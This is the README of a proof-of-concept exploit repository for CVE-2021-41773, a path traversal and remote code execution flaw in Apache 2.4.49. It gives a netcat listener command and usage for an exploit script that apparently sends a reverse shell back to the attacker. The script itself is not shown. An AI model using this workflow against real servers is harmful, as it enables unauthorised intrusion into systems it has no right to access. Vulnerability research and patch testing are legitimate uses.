Bash POC script for RCE vulnerability in Apache 2.4.49# CVE-2021-41773
A simple bash POC script for Path Traversal & RCE vulnerability in Apache 2.4.49
### Example usage:
Setup a netcat listener:
```
$ nc -nvlp <Port>
```
Then run the script:
```
$ ./exploit.sh <Target URL> <Listener IP> <Port>
```
### Disclamer
This tool is for educational purposes only. I hold no responsibility for any misuse.
[4.0K] /data/pocs/e380ff81c3af6493f012a8299a79a45a23a9d240
├── [ 531] exploit.sh
├── [1.0K] LICENSE
└── [ 346] README.md
0 directories, 3 files